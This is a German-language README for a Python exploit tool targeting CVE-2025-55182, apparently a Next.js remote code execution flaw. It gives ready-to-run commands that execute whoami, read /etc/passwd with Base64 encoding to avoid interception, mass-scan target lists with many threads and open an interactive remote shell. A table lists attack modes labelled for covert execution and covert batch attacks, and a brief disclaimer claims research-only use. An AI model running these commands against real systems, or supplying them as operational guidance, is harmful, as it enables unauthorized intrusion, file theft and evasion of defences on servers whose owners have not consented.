
Python-basierter Exploit für CVE-2025-55182 (Next.js RCE) mit Einzel-/Batch-Ziel-Scanning, Befehlsausführung, interaktiver Shell und 4 Angriffsmodi mit Base64-Kodierungsunterstützung.
Dieses Tool dient zur Erkennung und Ausnutzung der CVE-2025-55182-Sicherheitslücke (vermutlich eine Code-Ausführungslücke in Next.js-basierten Frameworks). Es unterstützt Einzel-/Mehrziel-Batch-Scans, Befehlsausführung, interaktive Shell und bietet 4 Angriffsmodi für verschiedene Szenarien. Flexible Konfigurationen wie Base64-codierte Befehle, Proxy-Weiterleitung und Log-Ausgabe sind verfügbar.
Die Schwachstelle CVE-2025-55182 könnte in Next.js-basierten Anwendungen existieren. Durch das Erstellen einer bösartigen Anfrage wird die Ausführungslogik in _response manipuliert, um das child_process-Modul zu injizieren und so eine Remote-Code-Ausführung (RCE) zu ermöglichen. Das Tool sendet speziell gestaltete Formulardaten, löst die Schwachstelle aus und gibt das Ergebnis der Befehlsausführung zurück.
requestspip install requests
# Führe den Befehl whoami aus (Angriffsmodus 1: mit Antwort)
python CVE-2025-55182-exploit.py -u https://target.com -c "whoami"
# Führe Systembefehl aus (Base64-codiert, um Sonderzeichenabfang zu vermeiden)
python CVE-2025-55182-exploit.py -u https://target.com -c "cat /etc/passwd" -b
# Vollständiger Antwortmodus (Base64-decodierte Ergebnisausgabe)
python CVE-2025-55182-exploit.py -u https://target.com -c "ipconfig" -p 4
# Lese Ziel-URLs aus Datei, führe den Befehl id aus (20 Threads)
python CVE-2025-55182-exploit.py -l targets.txt -c "id" -t 20 -o result.log
# Verbinde mit Ziel und wechsle in interaktive Befehlszeile (Unterstützung für Base64-Umschaltung)
python CVE-2025-55182-exploit.py -u https://target.com -s
# Packetanalyse über Burp Suite Proxy
python CVE-2025-55182-exploit.py -u https://target.com -c "whoami" --proxy http://127.0.0.1:8080
Nach Eintritt in den -s-Modus werden folgende integrierte Befehle unterstützt:
| Befehl | Funktionsbeschreibung |
|---|---|
b64 | Wechsel in Base64-codierten Befehlsmodus |
nob64 | Base64-Codierung beenden |
--outlog angegebene Datei geschrieben, für spätere Analyse;-u und -l schließen sich aus; bei gleichzeitiger Angabe wird -u bevorzugt.-c und -s schließen sich aus; im -s-Modus ist -c nicht erforderlich.-l-Datei kein Protokoll haben (z.B. target.com), versucht das Tool automatisch http:// und https://.https://target.com), um unnötige Verbindungsfehler zu vermeiden.--skip-check, um die Prüfung zu überspringen.-p 4 vollständiger Antwortmodus).-b), um ein Abfangen des Befehls durch das Zielsystem zu vermeiden.--time-out-Zeit.http://target.com).Dieses Tool dient ausschließlich der Cybersicherheitsforschung und Schwachstellenvalidierung. Der Anwender trägt die alleinige Verantwortung für alle Konsequenzen, die sich aus Verstößen gegen das „Cybersicherheitsgesetz“ oder andere einschlägige Gesetze ergeben. Der Entwickler des Tools übernimmt keine Haftung.
| Parameter | Abkürzung | Erforderlich | Beschreibung | Beispiel |
|---|
--url | -u | Nein | Einzelziel-URL (alternativ zu -l, Priorität für -u) | -u https://target.com |
--url-list | -l | Nein | Datei mit Ziel-URLs (eine URL pro Zeile, ohne Protokoll automatisch http/https) | -l urls.txt |
--payload | -p | Nein | Angriffsmodus (Standard: 1) 1=mit Antwort (execSync) 2=ohne Antwort (execSync) 3=ohne Antwort (exec) | -p 2 |
--cmd | -c | Nein | Auszuführender Systembefehl (erforderlich bei Batch/Einzelziel, schließt sich mit -s aus) | -c "whoami" oder -c "dir" |
--threads | -t | Nein | Anzahl Threads für Batch-Scan (Standard: 10, empfohlen ≤50) | -t 20 |
--outlog | -o | Nein | Log-Datei (Standard: cve-2025-55182.log) | -o exploit.log |
--base64 | -b | Nein | Base64-Codierung des mit -c angegebenen Befehls (vermeidet Sonderzeichenabfang) | -c "cat /etc/passwd" -b |
--cmd-shell | -s | Nein | Interaktiver Shell-Modus (nur mit -u, schließt sich mit -c aus) | -u https://target.com -s |
--proxy | - | Nein | Proxy-Konfiguration (HTTP/HTTPS für Paketanalyse oder Verkehrsumleitung) | --proxy http://127.0.0.1:8080 |
--skip-check | - | Nein | Überspringt Proxy-Verfügbarkeitsprüfung (standardmäßig wird Proxy geprüft) | --proxy http://127.0.0.1:8080 --skip-check |
--time-out | - | Nein | Request-Timeout in Sekunden (Standard: 10) | --time-out 15 |
| Modus-Nr. | Modusbeschreibung | Eigenschaften | Anwendungsszenario |
|---|
| 1 | Mit Antwort (execSync) | Synchroner Befehl, liefert 303-Weiterleitung, Ergebnis im Antwort-Header | Schnelle Überprüfung auf Existenz der Schwachstelle |
| 2 | Ohne Antwort (execSync) | Synchroner Befehl, kein Ergebnis (Ausführung muss anderweitig bestätigt werden) | Verdeckte Ausführung |
| 3 | Ohne Antwort (exec) | Asynchroner Befehl, kein Ergebnis (geringe Spuren, geeignet für Operationen ohne Bestätigung) | Verdeckter Batch-Angriff |
| 4 | Vollständige Antwort | Synchroner Befehl, Ergebnis Base64-codiert im Antwort-Body (Tool decodiert automatisch) | Szenarien, bei denen vollständige Ausgabe benötigt wird |
exit| Interaktive Shell beenden |
? | Hilfe anzeigen |
-b oder b64-Modus übernimmt das Tool die Base64-Codierung/-Decodierung automatisch; kein manueller Eingriff nötig.--time-out-Zeit erhöht werden, um Fehlalarme zu vermeiden.